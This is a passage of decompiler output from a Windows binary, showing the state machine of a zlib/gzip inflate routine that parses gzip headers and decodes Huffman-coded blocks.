							_t645 =  *(_t1036 + 0x30);
							if(_t645 != 0) {
								L297:
								return _t645;
							} else {
								L319:
								return 0xfffffffb;
							}
						}
					}
					goto L321;
					L154:
					_t815 = _t814 >> 5;
					_t1018[0x18] = (_t814 & 0x0000001f) + 0x101;
					_t816 = _t815 >> 5;
					_t626 = (_t815 & 0x0000001f) + 1;
					_t814 = _t816 >> 4;
					_t1023 = _t1023 - 0xe;
					_t1018[0x19] = _t626;
					_t1018[0x17] = (_t816 & 0x0000000f) + 4;
					if(_t1018[0x18] > 0x11e || _t626 > 0x1e) {
						L26:
						( *(_t1036 + 0x40))[6] = 0x41d338;
						goto L294;
					} else {
						L156:
						_t1018[0x1a] = 0;
						 *_t1018 = 0x10;
						L157:
						if(_t1018[0x1a] >= _t1018[0x17]) {
							L163:
							while(_t1018[0x1a] < 0x13) {
								L165:
								 *((short*)(_t1018 + 0x70 + ( *(0x41e468 + _t1018[0x1a] * 2) & 0x0000ffff) * 2)) = 0;
								_t1018[0x1a] = _t1018[0x1a] + 1;
							}
							L166:
							_t654 =  &(_t1018[0x14c]);
							_t1018[0x1b] = _t654;
							_t1018[0x13] = _t654;
							_t1018[0x15] = 7;
							_t657 = E00408C60(0,  &(_t1018[0x1c]), 0x13,  &(_t1018[0x1b]),  &(_t1018[0x15]),  &(_t1018[0xbc]));
							_t998 =  *(_t1036 + 0x28);
							_t1036 = _t1036 + 0x18;
							 *(_t1036 + 0x30) = _t657;
							if(_t657 != 0) {
								L293:
								( *(_t1036 + 0x40))[6] = 0x41d338;
								goto L294;
							} else {
								L167:
								_t1018[0x1a] = _t657;
								 *_t1018 = 0x11;
								L168:
								if(_t1018[0x1a] >= _t1018[0x19] + _t1018[0x18]) {
									L201:
									if( *_t1018 == 0x1b) {
										goto L295;
									} else {
										L202:
										_t660 =  &(_t1018[0x14c]);
										_t1018[0x1b] = _t660;
										_t1018[0x13] = _t660;
										_t1018[0x15] = 9;
										_t662 = E00408C60(1,  &(_t1018[0x1c]), _t1018[0x18],  &(_t1018[0x1b]),  &(_t1018[0x15]),  &(_t1018[0xbc]));
										_t1036 = _t1036 + 0x18;
										 *(_t1036 + 0x30) = _t662;
										if(_t662 == 0) {
											L204:
											_t1018[0x14] = _t1018[0x1b];
											_t1018[0x16] = 6;
											_t665 = E00408C60(2, _t1018 + 0x70 + _t1018[0x18] * 2, _t1018[0x19],  &(_t1018[0x1b]),  &(_t1018[0x16]),  &(_t1018[0xbc]));
											_t998 =  *(_t1036 + 0x28);
											_t1036 = _t1036 + 0x18;
											 *(_t1036 + 0x30) = _t665;
											if(_t665 == 0) {
												L206:
												 *_t1018 = 0x12;
												goto L207;
											} else {
												L205:
												( *(_t1036 + 0x40))[6] = 0x41d338;
												goto L294;
											}
										} else {
											L203:
											_t998 =  *(_t1036 + 0x10);
											( *(_t1036 + 0x40))[6] = 0x41d338;
											L294:
											 *_t1018 = 0x1b;
											while(1) {
												L295:
												_t623 =  *_t1018;
												if(_t623 > 0x1c) {
													break;
												}
												L1:
												switch( *((intOrPtr*)(_t623 * 4 +  &M004087C4))) {
													case 0:
														L2:
														if(_t1018[2] != 0) {
															L4:
															if(_t1023 >= 0x10) {
																L8:
																if((_t1018[2] & 0x00000002) == 0 || _t814 != 0x8b1f) {
																	_t628 = _t1018[8];
																	_t1018[4] = 0;
																	if(_t628 != 0) {
																		 *((intOrPtr*)(_t628 + 0x30)) = 0xffffffff;
																	}
																	L13:
																	if((_t1018[2] & 0x00000001) == 0 || (((_t814 & 0x000000ff) << 8) + (_t814 >> 8)) % 0x1f != 0) {
																		( *(_t1036 + 0x40))[6] = 0x41d338;
																		goto L294;
																	} else {
																		L15:
																		if((_t814 & 0x0000000f) == 8) {
																			L17:
																			_t814 = _t814 >> 4;
																			_t848 = (_t814 & 0x0000000f) + 8;
																			_t1023 = _t1023 - 4;
																			if(_t848 <= _t1018[9]) {
																				_push(0);
																				_push(0);
																				_push(0);
																				_t1018[5] = 1 << _t848;
																				_t633 = E004024A0();
																				_t998 =  *(_t1036 + 0x1c);
																				_t1018[6] = _t633;
																				 *( *((intOrPtr*)(_t1036 + 0x4c)) + 0x30) = _t633;
																				 *_t1018 =  !(_t814 >> 8) & 0x00000002 | 0x00000009;
																				_t1036 = _t1036 + 0xc;
																				_t814 = 0;
																				_t1023 = 0;
																			} else {
																				_t998 =  *(_t1036 + 0x10);
																				goto L293;
																			}
																		} else {
																			_t998 =  *(_t1036 + 0x10);
																			( *(_t1036 + 0x40))[6] = 0x41d338;
																			goto L294;
																		}
																	}
																} else {
																	_t1018[6] = E00403080(0, 0, 0);
																	 *(_t1036 + 0x2c) = 0x1f;
																	 *(_t1036 + 0x2d) = 0x8b;
																	_t636 = E00403080(_t1018[6], _t1036 + 0x2c, 2);
																	_t998 =  *(_t1036 + 0x28);
																	_t1036 = _t1036 + 0x18;
																	_t814 = 0;
																	_t1018[6] = _t636;
																	_t1023 = 0;
																	 *_t1018 = 1;
																}
																goto L295;
															} else {
																L6:
																while(_t998 != 0) {
																	_t652 = ( *_t1029 & 0x000000ff) << _t1023;
																	_t998 = _t998 - 1;
																	_t1023 = _t1023 + 8;
																	_t1029 =  &(_t1029[1]);
																	_t814 = _t814 + _t652;
																	 *(_t1036 + 0x10) = _t998;
																	if(_t1023 < 0x10) {
																		continue;
																	} else {
																		goto L8;
																	}
																	goto L321;
																}
																goto L303;
															}
														} else {
															 *_t1018 = 0xc;
															goto L295;
														}
														goto L321;
													case 1:
														L21:
														if(__esi >= 0x10) {
															L24:
															 *(__edi + 0x10) = __ebx;
															if(__bl != 8) {
																goto L293;
															} else {
																L25:
																if((__ebx & 0x0000e000) == 0) {
																	L27:
																	__eax =  *(__edi + 0x20);
																	if(__eax != 0) {
																		__ebx = __ebx >> 8;
																		__ecx = __ebx >> 0x00000008 & 0x00000001;
																		 *__eax = __ebx >> 0x00000008 & 0x00000001;
																	}
																	if(( *(__edi + 0x10) & 0x00000200) != 0) {
																		 *(__esp + 0x1c) = __bl;
																		__ebx = __ebx >> 8;
																		__edx = __esp + 0x20;
																		 *(__esp + 0x21) = __bl;
																		__eax =  *(__edi + 0x18);
																		__eax = E00403080( *(__edi + 0x18), __esp + 0x20, 2);
																		__edx =  *(__esp + 0x1c);
																		 *(__edi + 0x18) = __eax;
																	}
																	__ebx = 0;
																	__esi = 0;
																	 *__edi = 2;
																	goto L34;
																} else {
																	goto L26;
																}
															}
														} else {
															L22:
															while(__edx != 0) {
																__eax =  *__ebp & 0x000000ff;
																__ecx = __esi;
																__eax = ( *__ebp & 0x000000ff) << __cl;
																__edx = __edx - 1;
																__esi = __esi + 8;
																__ebp =  &(__ebp[1]);
																__ebx = __ebx + __eax;
																 *(__esp + 0x10) = __edx;
																if(__esi < 0x10) {
																	continue;
																} else {
																	goto L24;
																}
																goto L321;
															}
															goto L303;
														}
														goto L321;
													case 2:
														L32:
														if(__esi >= 0x20) {
															L36:
															__eax =  *(__edi + 0x20);
															if(__eax != 0) {
																 *(__eax + 4) = __ebx;
															}
															if(( *(__edi + 0x10) & 0x00000200) != 0) {
																 *(__esp + 0x1c) = __bl;
																__ecx = __ebx;
																__edx = __ebx;
																__ecx = __ebx >> 8;
																__edx = __ebx >> 0x10;
																__ebx = __ebx >> 0x18;
																__eax = __esp + 0x20;
																 *(__esp + 0x21) = __cl;
																 *((char*)(__esp + 0x22)) = __dl;
																 *(__esp + 0x23) = __bl;
																__ecx =  *(__edi + 0x18);
																__eax = E00403080( *(__edi + 0x18), __esp + 0x20, 4);
																__edx =  *(__esp + 0x1c);
																 *(__edi + 0x18) = __eax;
															}
															__ebx = 0;
															__esi = 0;
															 *__edi = 3;
															goto L43;
														} else {
															L33:
															L34:
															while(__edx != 0) {
																__eax =  *__ebp & 0x000000ff;
																__ecx = __esi;
																__eax = ( *__ebp & 0x000000ff) << __cl;
																__edx = __edx - 1;
																__esi = __esi + 8;
																__ebp =  &(__ebp[1]);
																__ebx = __ebx + __eax;
																 *(__esp + 0x10) = __edx;
																if(__esi < 0x20) {
																	continue;
																} else {
																	goto L36;
																}
																goto L321;
															}
															goto L303;
														}
														goto L321;
													case 3:
														L41:
														if(__esi >= 0x10) {
															L45:
															__eax =  *(__edi + 0x20);
															if(__eax != 0) {
																__ebx = __ebx & 0x000000ff;
																 *(__eax + 8) = __ebx & 0x000000ff;
																__ecx =  *(__edi + 0x20);
																__eax = __ebx;
																__eax = __ebx >> 8;
																 *( *(__edi + 0x20) + 0xc) = __eax;
															}
															if(( *(__edi + 0x10) & 0x00000200) != 0) {
																 *(__esp + 0x1c) = __bl;
																__ebx = __ebx >> 8;
																__edx = __esp + 0x20;
																 *(__esp + 0x21) = __bl;
																__eax =  *(__edi + 0x18);
																__eax = E00403080( *(__edi + 0x18), __esp + 0x20, 2);
																__edx =  *(__esp + 0x1c);
																 *(__edi + 0x18) = __eax;
															}
															__ebx = 0;
															__esi = 0;
															 *__edi = 4;
															goto L50;
														} else {
															L42:
															L43:
															while(__edx != 0) {
																__eax =  *__ebp & 0x000000ff;
																__ecx = __esi;
																__eax = ( *__ebp & 0x000000ff) << __cl;
																__edx = __edx - 1;
																__esi = __esi + 8;
																__ebp =  &(__ebp[1]);
																__ebx = __ebx + __eax;
																 *(__esp + 0x10) = __edx;
																if(__esi < 0x10) {
																	continue;
																} else {
																	goto L45;
																}
																goto L321;
															}
															goto L303;
														}
														goto L321;
													case 4:
														L50:
														if(( *(__edi + 0x10) & 0x00000400) == 0) {
															L59:
															__eax =  *(__edi + 0x20);
															if(__eax != 0) {
																 *(__eax + 0x10) = 0;
															}
															goto L61;
														} else {
															L51:
															if(__esi >= 0x10) {
																L54:
																__eax =  *(__edi + 0x20);
																 *(__edi + 0x40) = __ebx;
																if(__eax != 0) {
																	 *(__eax + 0x14) = __ebx;
																}
																if(( *(__edi + 0x10) & 0x00000200) != 0) {
																	 *(__esp + 0x1c) = __bl;
																	__ebx = __ebx >> 8;
																	__ecx = __esp + 0x20;
																	 *(__esp + 0x21) = __bl;
																	__edx =  *(__edi + 0x18);
																	__eax = E00403080( *(__edi + 0x18), __esp + 0x20, 2);
																	__edx =  *(__esp + 0x1c);
																	 *(__edi + 0x18) = __eax;
																}
																__ebx = 0;
																__esi = 0;
																L61:
																 *__edi = 5;
																goto L62;
															} else {
																L52:
																while(__edx != 0) {
																	__eax =  *__ebp & 0x000000ff;
																	__ecx = __esi;
																	__eax = ( *__ebp & 0x000000ff) << __cl;
																	__edx = __edx - 1;
																	__esi = __esi + 8;
																	__ebp =  &(__ebp[1]);
																	__ebx = __ebx + __eax;
																	 *(__esp + 0x10) = __edx;
																	if(__esi < 0x10) {
																		continue;
																	} else {
																		goto L54;
																	}
																	goto L321;
																}
																goto L303;
															}
														}
														goto L321;
													case 5:
														L62:
														if(( *(__edi + 0x10) & 0x00000400) == 0) {
															L75:
															 *(__edi + 0x40) = 0;
															 *__edi = 6;
															goto L76;
														} else {
															L63:
															__eax =  *(__edi + 0x40);
															 *(__esp + 0x14) = __eax;
															if(__eax > __edx) {
																__eax = __edx;
																 *(__esp + 0x14) = __edx;
															}
															if(__eax != 0) {
																__ecx =  *(__edi + 0x20);
																if(__ecx != 0) {
																	__ecx =  *(__ecx + 0x10);
																	 *(__esp + 0x34) = __ecx;
																	if(__ecx != 0) {
																		 *(__edi + 0x20) =  *( *(__edi + 0x20) + 0x14);
																		__ecx =  *( *(__edi + 0x20) + 0x14) -  *(__edi + 0x40);
																		__edx =  *(__edi + 0x20);
																		__edx =  *( *(__edi + 0x20) + 0x18);
																		 *(__esp + 0x20) = __ecx;
																		if(__ecx > __edx) {
																			__eax = __edx;
																		}
																		__edx =  *(__esp + 0x34);
																		__eax =  *(__esp + 0x24);
																		__edx =  *(__esp + 0x34) +  *(__esp + 0x24);
																		__eax = E0040B350(__ebx, __edi, __esi,  *(__esp + 0x34) +  *(__esp + 0x24), __ebp,  *(__esp + 0x24));
																		__eax =  *(__esp + 0x20);
																		__edx =  *(__esp + 0x1c);
																	}
																}
																if(( *(__edi + 0x10) & 0x00000200) != 0) {
																	__ecx =  *(__esp + 0x14);
																	__edx =  *(__edi + 0x18);
																	__eax = E00403080( *(__edi + 0x18), __ebp,  *(__esp + 0x14));
																	__edx =  *(__esp + 0x1c);
																	 *(__edi + 0x18) = __eax;
																	__eax =  *(__esp + 0x20);
																}
																__edx = __edx - __eax;
																__ebp =  &(__ebp[__eax]);
																 *(__edi + 0x40) =  *(__edi + 0x40) - __eax;
																 *(__esp + 0x10) = __edx;
															}
															if( *(__edi + 0x40) != 0) {
																goto L303;
															} else {
																goto L75;
															}
														}
														goto L321;
													case 6:
														L76:
														if(( *(__edi + 0x10) & 0x00000800) == 0) {
															L89:
															__eax =  *(__edi + 0x20);
															if(__eax != 0) {
																 *(__eax + 0x1c) = 0;
															}
															goto L91;
														} else {
															L77:
															if(__edx == 0) {
																goto L303;
															} else {
																L78:
																__eax = 0;
																while(1) {
																	L79:
																	__ecx = __ebp[__eax] & 0x000000ff;
																	 *(__esp + 0x14) = __eax;
																	__eax =  *(__edi + 0x20);
																	 *(__esp + 0x20) = __ecx;
																	if(__eax != 0) {
																		__ecx =  *(__eax + 0x1c);
																		 *(__esp + 0x34) = __ecx;
																		if(__ecx != 0) {
																			__ecx =  *(__edi + 0x40);
																			if(__ecx <  *((intOrPtr*)(__eax + 0x20))) {
																				__edx =  *(__esp + 0x34);
																				 *((char*)( *(__esp + 0x34) + __ecx)) =  *(__esp + 0x20);
																				 *(__edi + 0x40) =  *(__edi + 0x40) + 1;
																				__edx =  *(__esp + 0x10);
																			}
																		}
																	}
																	if( *(__esp + 0x20) == 0) {
																		break;
																	}
																	L84:
																	__eax =  *(__esp + 0x14);
																	if(__eax < __edx) {
																		continue;
																	}
																	break;
																}
																L85:
																if(( *(__edi + 0x10) & 0x00000200) != 0) {
																	__ecx =  *(__esp + 0x14);
																	__edx =  *(__edi + 0x18);
																	__eax = E00403080( *(__edi + 0x18), __ebp,  *(__esp + 0x14));
																	__edx =  *(__esp + 0x1c);
																	 *(__edi + 0x18) = __eax;
																}
																__eax =  *(__esp + 0x14);
																__edx = __edx - __eax;
																__ebp =  &(__ebp[__eax]);
																 *(__esp + 0x10) = __edx;
																if( *(__esp + 0x20) != 0) {
																	goto L303;
																} else {
																	L88:
																	L91:
																	 *(__edi + 0x40) = 0;
																	 *__edi = 7;
																	goto L92;
																}
															}
														}
														goto L321;
													case 7:
														L92:
														if(( *(__edi + 0x10) & 0x00001000) == 0) {
															L105:
															__eax =  *(__edi + 0x20);
															if(__eax != 0) {
																 *(__eax + 0x24) = 0;
															}
															goto L107;
														} else {
															L93:
															if(__edx == 0) {
																goto L303;
															} else {
																L94:
																__eax = 0;
																while(1) {
																	L95:
																	__ecx = __ebp[__eax] & 0x000000ff;
																	 *(__esp + 0x14) = __eax;
																	__eax =  *(__edi + 0x20);
																	 *(__esp + 0x20) = __ecx;
																	if(__eax != 0) {
																		__ecx =  *(__eax + 0x24);
																		 *(__esp + 0x34) = __ecx;
																		if(__ecx != 0) {
																			__ecx =  *(__edi + 0x40);
																			if(__ecx <  *((intOrPtr*)(__eax + 0x28))) {
																				__edx =  *(__esp + 0x34);
																				 *((char*)( *(__esp + 0x34) + __ecx)) =  *(__esp + 0x20);
																				 *(__edi + 0x40) =  *(__edi + 0x40) + 1;
																				__edx =  *(__esp + 0x10);
																			}
																		}
																	}
																	if( *(__esp + 0x20) == 0) {
																		break;
																	}
																	L100:
																	__eax =  *(__esp + 0x14);
																	if(__eax < __edx) {
																		continue;
																	}
																	break;
																}
																L101:
																if(( *(__edi + 0x10) & 0x00000200) != 0) {
																	__ecx =  *(__esp + 0x14);
																	__edx =  *(__edi + 0x18);
																	__eax = E00403080( *(__edi + 0x18), __ebp,  *(__esp + 0x14));
																	__edx =  *(__esp + 0x1c);
																	 *(__edi + 0x18) = __eax;
																}
																__eax =  *(__esp + 0x14);
																__edx = __edx - __eax;
																__ebp =  &(__ebp[__eax]);
																 *(__esp + 0x10) = __edx;
																if( *(__esp + 0x20) != 0) {
																	goto L303;
																} else {
																	L104:
																	L107:
																	 *__edi = 8;
																	goto L108;
																}
															}
														}
														goto L321;
													case 8:
														L108:
														if(( *(__edi + 0x10) & 0x00000200) == 0) {
															L115:
															__eax =  *(__edi + 0x20);
															if(__eax != 0) {
																 *(__edi + 0x10) =  *(__edi + 0x10) >> 9;
																__ecx =  *(__edi + 0x10) >> 0x00000009 & 0x00000001;
																 *(__eax + 0x2c) =  *(__edi + 0x10) >> 0x00000009 & 0x00000001;
																__edx =  *(__edi + 0x20);
																 *( *(__edi + 0x20) + 0x30) = 1;
															}
															__eax = E00403080(0, 0, 0);
															__ecx =  *(__esp + 0x4c);
															__edx =  *(__esp + 0x1c);
															 *(__edi + 0x18) = __eax;
															 *( *(__esp + 0x4c) + 0x30) = __eax;
															 *__edi = 0xb;
															goto L295;
														} else {
															L109:
															if(__esi >= 0x10) {
																L112:
																__ecx =  *(__edi + 0x18) & 0x0000ffff;
																if(__ebx == ( *(__edi + 0x18) & 0x0000ffff)) {
																	L114:
																	__ebx = 0;
																	__esi = 0;
																	goto L115;
																} else {
																	L113:
																	__eax =  *(__esp + 0x40);
																	 *(__eax + 0x18) = 0x41d338;
																	goto L294;
																}
																goto L295;
															} else {
																L110:
																while(__edx != 0) {
																	__eax =  *__ebp & 0x000000ff;
																	__ecx = __esi;
																	__eax = ( *__ebp & 0x000000ff) << __cl;
																	__edx = __edx - 1;
																	__esi = __esi + 8;
																	__ebp =  &(__ebp[1]);
																	__ebx = __ebx + __eax;
																	 *(__esp + 0x10) = __edx;
																	if(__esi < 0x10) {
																		continue;
																	} else {
																		goto L112;
																	}
																	goto L321;
																}
																goto L303;
															}
														}
														goto L321;
													case 9:
														L118:
														if(__esi >= 0x20) {
															L122:
															__ebx = __ebx & 0x0000ff00;
															__ebx = __ebx << 0x10;
															__ecx = (__ebx & 0x0000ff00) + (__ebx << 0x10);
															__ebx = __ebx >> 8;
															__ecx = (__ebx & 0x0000ff00) + (__ebx << 0x10) << 8;
															__eax = __ebx >> 0x00000008 & 0x0000ff00;
															__ecx = ((__ebx & 0x0000ff00) + (__ebx << 0x10) << 8) + (__ebx >> 0x00000008 & 0x0000ff00);
															__eax = __ecx + __ebx;
															__ecx =  *(__esp + 0x40);
															 *(__edi + 0x18) = __eax;
															 *( *(__esp + 0x40) + 0x30) = __eax;
															__ebx = 0;
															__esi = 0;
															 *__edi = 0xa;
															goto L123;
														} else {
															L119:
															L120:
															while(__edx != 0) {
																__eax =  *__ebp & 0x000000ff;
																__ecx = __esi;
																__eax = ( *__ebp & 0x000000ff) << __cl;
																__edx = __edx - 1;
																__esi = __esi + 8;
																__ebp =  &(__ebp[1]);
																__ebx = __ebx + __eax;
																 *(__esp + 0x10) = __edx;
																if(__esi < 0x20) {
																	continue;
																} else {
																	goto L122;
																}
																goto L321;
															}
															goto L303;
														}
														goto L321;
													case 0xa:
														L123:
														if( *((intOrPtr*)(__edi + 0xc)) == 0) {
															L298:
															__eax =  *(__esp + 0x40);
															__ecx =  *(__esp + 0x24);
															 *(__eax + 0xc) =  *(__esp + 0x24);
															__ecx =  *(__esp + 0x18);
															 *__eax = __ebp;
															 *(__eax + 0x10) =  *(__esp + 0x18);
															 *(__eax + 4) = __edx;
															 *(__edi + 0x3c) = __esi;
															_pop(__esi);
															_pop(__ebp);
															 *(__edi + 0x38) = __ebx;
															_pop(__ebx);
															__eax = 2;
															_pop(__edi);
															__esp = __esp + 0x2c;
															return 2;
														} else {
															L124:
															_push(0);
															_push(0);
															_push(0);
															__eax = E004024A0();
															__edx =  *(__esp + 0x4c);
															 *(__edi + 0x18) = __eax;
															 *( *(__esp + 0x4c) + 0x30) = __eax;
															__edx =  *(__esp + 0x1c);
															__esp = __esp + 0xc;
															 *__edi = 0xb;
															goto L125;
														}
														goto L321;
													case 0xb:
														L125:
														if( *((intOrPtr*)(__esp + 0x44)) == 5) {
															goto L303;
														} else {
															goto L126;
														}
														goto L321;
													case 0xc:
														L126:
														if( *(__edi + 4) == 0) {
															L128:
															if(__esi >= 3) {
																L132:
																__ecx = __ebx;
																__ebx = __ebx >> 1;
																__eax = __ebx;
																__ecx = __ecx & 0x00000001;
																__eax = __ebx & 0x00000003;
																__esi = __esi - 1;
																 *(__edi + 4) = __ecx;
																if(__eax > 3) {
																	L138:
																	__ebx = __ebx >> 2;
																	__esi = __esi - 2;
																} else {
																	L133:
																	switch( *((intOrPtr*)(__eax * 4 +  &M00408838))) {
																		case 0:
																			L134:
																			__ebx = __ebx >> 2;
																			 *__edi = 0xd;
																			__esi = __esi - 2;
																			goto L295;
																		case 1:
																			L135:
																			__eax = __edi;
																			__eax = E00407290(__edi);
																			__ebx = __ebx >> 2;
																			 *__edi = 0x12;
																			__esi = __esi - 2;
																			goto L295;
																		case 2:
																			L136:
																			__ebx = __ebx >> 2;
																			 *__edi = 0xf;
																			__esi = __esi - 2;
																			goto L295;
																		case 3:
																			L137:
																			__eax =  *(__esp + 0x40);
																			 *(__eax + 0x18) = 0x41d338;
																			 *__edi = 0x1b;
																			goto L138;
																	}
																}
																goto L295;
															} else {
																L129:
																L130:
																while(__edx != 0) {
																	__eax =  *__ebp & 0x000000ff;
																	__ecx = __esi;
																	__eax = ( *__ebp & 0x000000ff) << __cl;
																	__edx = __edx - 1;
																	__esi = __esi + 8;
																	__ebp =  &(__ebp[1]);
																	__ebx = __ebx + __eax;
																	 *(__esp + 0x10) = __edx;
																	if(__esi < 3) {
																		continue;
																	} else {
																		goto L132;
																	}
																	goto L321;
																}
																goto L303;
															}
														} else {
															L127:
															__esi = __esi & 0x00000007;
															__ebx = __ebx >> __cl;
															__esi = __esi - (__esi & 0x00000007);
															 *__edi = 0x18;
															goto L295;
														}
														goto L321;
													case 0xd:
														L139:
														__esi = __esi & 0x00000007;
														__esi = __esi - (__esi & 0x00000007);
														__ebx = __ebx >> __cl;
														if(__esi >= 0x20) {
															L142:
															__ecx = __ebx;
															__eax = __ebx;
															__ecx =  !__ebx;
															__eax = __ebx & 0x0000ffff;
															__ecx =  !__ebx >> 0x10;
															if(__eax ==  !__ebx >> 0x10) {
																L144:
																__ebx = 0;
																 *(__edi + 0x40) = __eax;
																__esi = 0;
																 *__edi = 0xe;
																goto L145;
															} else {
																L143:
																__eax =  *(__esp + 0x40);
																 *(__eax + 0x18) = 0x41d338;
																goto L294;
															}
														} else {
															L140:
															while(__edx != 0) {
																__eax =  *__ebp & 0x000000ff;
																__ecx = __esi;
																__eax = ( *__ebp & 0x000000ff) << __cl;
																__edx = __edx - 1;
																__esi = __esi + 8;
																__ebp =  &(__ebp[1]);
																__ebx = __ebx + __eax;
																 *(__esp + 0x10) = __edx;
																if(__esi < 0x20) {
																	continue;
																} else {
																	goto L142;
																}
																goto L321;
															}
															goto L303;
														}
														goto L321;
													case 0xe:
														L145:
														__eax =  *(__edi + 0x40);
														 *(__esp + 0x14) = __eax;
														if(__eax == 0) {
															goto L224;
														} else {
															L146:
															if(__eax > __edx) {
																__eax = __edx;
																 *(__esp + 0x14) = __edx;
															}
															__ecx =  *(__esp + 0x18);
															if(__eax > __ecx) {
																__eax = __ecx;
																 *(__esp + 0x14) = __eax;
															}
															if(__eax == 0) {
																goto L303;
															} else {
																L151:
																__ecx =  *(__esp + 0x14);
																__edx =  *(__esp + 0x24);
																__eax = E0040B350(__ebx, __edi, __esi,  *(__esp + 0x24), __ebp,  *(__esp + 0x14));
																__eax =  *(__esp + 0x20);
																 *(__esp + 0x1c) =  *(__esp + 0x1c) - __eax;
																 *(__esp + 0x24) =  *(__esp + 0x24) - __eax;
																 *(__esp + 0x30) =  *(__esp + 0x30) + __eax;
																__edx =  *(__esp + 0x1c);
																__ebp =  &(__ebp[__eax]);
																 *(__edi + 0x40) =  *(__edi + 0x40) - __eax;
																goto L295;
															}
														}
														goto L321;
													case 0xf:
														goto L0;
													case 0x10:
														goto L157;
													case 0x11:
														goto L168;
													case 0x12:
														L207:
														if(_t998 < 6 ||  *(_t1036 + 0x18) < 0x102) {
															L210:
															_t671 =  *(_t1018[0x13] + ((0x00000001 << _t1018[0x15]) - 0x00000001 & _t814) * 4);
															 *(_t1036 + 0x14) = _t671;
															if((_t671 >> 0x00000008 & 0x000000ff) <= _t1023) {
																L214:
																if(_t671 == 0 || (_t671 & 0x000000f0) != 0) {
																	L221:
																	_t864 = _t671 >> 0x00000008 & 0x000000ff;
																	_t814 = _t814 >> _t864;
																	_t1023 = _t1023 - _t864;
																	 *(_t1036 + 0x20) = _t864;
																	_t1018[0x10] = _t671 >> 0x10;
																	if(_t671 != 0) {
																		L223:
																		if((_t671 & 0x00000020) == 0) {
																			L225:
																			if((_t671 & 0x00000040) == 0) {
																				L227:
																				_t1018[0x12] = _t671 & 0xf;
																				 *_t1018 = 0x13;
																				goto L228;
																			} else {
																				L226:
																				( *(_t1036 + 0x40))[6] = 0x41d338;
																				goto L294;
																			}
																		} else {
																			L224:
																			 *_t1018 = 0xb;
																			goto L295;
																		}
																	} else {
																		L222:
																		 *_t1018 = 0x17;
																		goto L295;
																	}
																} else {
																	L216:
																	_t928 = _t671 >> 8;
																	 *(_t1036 + 0x34) = _t928;
																	 *(_t1036 + 0x20) = _t928 & 0x000000ff;
																	 *(_t1036 + 0x2c) = _t671;
																	_t738 =  *(_t1018[0x13] + ((((0x00000001 << (_t671 & 0x000000ff) +  *(_t1036 + 0x20)) - 0x00000001 & _t814) >>  *(_t1036 + 0x20)) + ( *(_t1036 + 0x14) >> 0x10)) * 4);
																	 *(_t1036 + 0x14) = _t738;
																	if((_t738 >> 0x00000008 & 0x000000ff) + ( *(_t1036 + 0x34) & 0x000000ff) <= _t1023) {
																		L220:
																		_t937 =  *(_t1036 + 0x2d) & 0x000000ff;
																		_t671 =  *(_t1036 + 0x14);
																		_t814 = _t814 >> _t937;
																		_t1023 = _t1023 - _t937;
																		goto L221;
																	} else {
																		L217:
																		L218:
																		while(_t998 != 0) {
																			_t743 = ( *_t1029 & 0x000000ff) << _t1023;
																			_t939 =  *(_t1036 + 0x2c);
																			_t998 = _t998 - 1;
																			_t1023 = _t1023 + 8;
																			_t814 = _t814 + _t743;
																			_t744 = _t939 & 0x000000ff;
																			 *(_t1036 + 0x20) = _t744;
																			_t1029 =  &(_t1029[1]);
																			 *(_t1036 + 0x10) = _t998;
																			 *(_t1036 + 0x14) = 1;
																			if(( *(_t1018[0x13] + ((((0x00000001 << (_t939 & 0x000000ff) + _t744) - 0x00000001 & _t814) >>  *(_t1036 + 0x20)) + ( *(_t1036 + 0x2e) & 0x0000ffff)) * 4) >> 0x00000008 & 0x000000ff) +  *(_t1036 + 0x20) > _t1023) {
																				continue;
																			} else {
																				goto L220;
																			}
																			goto L321;
																		}
																		goto L303;
																	}
																}
															} else {
																L211:
																L212:
																while(_t998 != 0) {
																	_t756 = ( *_t1029 & 0x000000ff) << _t1023;
																	_t998 = _t998 - 1;
																	_t1023 = _t1023 + 8;
																	_t814 = _t814 + _t756;
																	_t1029 =  &(_t1029[1]);
																	 *(_t1036 + 0x10) = _t998;
																	_t671 =  *(_t1018[0x13] + ((0x00000001 << _t1018[0x15]) - 0x00000001 & _t814) * 4);
																	 *(_t1036 + 0x14) = 1;
																	if(0xad > _t1023) {
																		continue;
																	} else {
																		goto L214;
																	}
																	goto L321;
																}
																goto L303;
															}
														} else {
															L209:
															_t761 =  *(_t1036 + 0x40);
															_t761[4] =  *(_t1036 + 0x18);
															_t761[3] =  *(_t1036 + 0x24);
															_push( *(_t1036 + 0x28));
															 *_t761 = _t1029;
															_t761[1] =  *(_t1036 + 0x10);
															_push(_t761);
															_t1018[0xe] = _t814;
															_t1018[0xf] = _t1023;
															E00406CA0();
															_t763 =  *(_t1036 + 0x48);
															_t1029 =  *_t763;
															_t764 = _t763[1];
															_t814 = _t1018[0xe];
															_t1023 = _t1018[0xf];
															 *(_t1036 + 0x20) = _t763[4];
															_t1036 = _t1036 + 8;
															 *(_t1036 + 0x24) = _t763[3];
															 *(_t1036 + 0x10) = _t764;
															_t998 = _t764;
															goto L295;
														}
														goto L321;
													case 0x13:
														L228:
														_t672 = _t1018[0x12];
														if(_t672 == 0) {
															L234:
															 *_t1018 = 0x14;
															goto L235;
														} else {
															L229:
															if(_t1023 >= _t672) {
																L233:
																_t925 = _t1018[0x12];
																_t1018[0x10] = _t1018[0x10] + ((0x00000001 << _t925) - 0x00000001 & _t814);
																_t814 = _t814 >> _t925;
																_t1023 = _t1023 - _t925;
																goto L234;
															} else {
																L230:
																L231:
																while(_t998 != 0) {
																	_t729 = ( *_t1029 & 0x000000ff) << _t1023;
																	_t998 = _t998 - 1;
																	_t1023 = _t1023 + 8;
																	_t1029 =  &(_t1029[1]);
																	_t814 = _t814 + _t729;
																	 *(_t1036 + 0x10) = _t998;
																	if(_t1023 < _t1018[0x12]) {
																		continue;
																	} else {
																		goto L233;
																	}
																	goto L321;
																}
																goto L303;
															}
														}
														goto L321;
													case 0x14:
														L235:
														_t678 =  *((intOrPtr*)(_t1018[0x14] + ((0x00000001 << _t1018[0x16]) - 0x00000001 & _t814) * 4));
														 *(_t1036 + 0x14) = _t678;
														if((_t678 >> 0x00000008 & 0x000000ff) <= _t1023) {
															L239:
															if((_t678 & 0x000000f0) != 0) {
																L244:
																_t876 = _t678 >> 0x00000008 & 0x000000ff;
																_t814 = _t814 >> _t876;
																_t1023 = _t1023 - _t876;
																 *(_t1036 + 0x20) = _t876;
																if((_t678 & 0x00000040) == 0) {
																	L246:
																	_t1018[0x11] = _t678 >> 0x10;
																	_t1018[0x12] = _t678 & 0xf;
																	 *_t1018 = 0x15;
																	goto L247;
																} else {
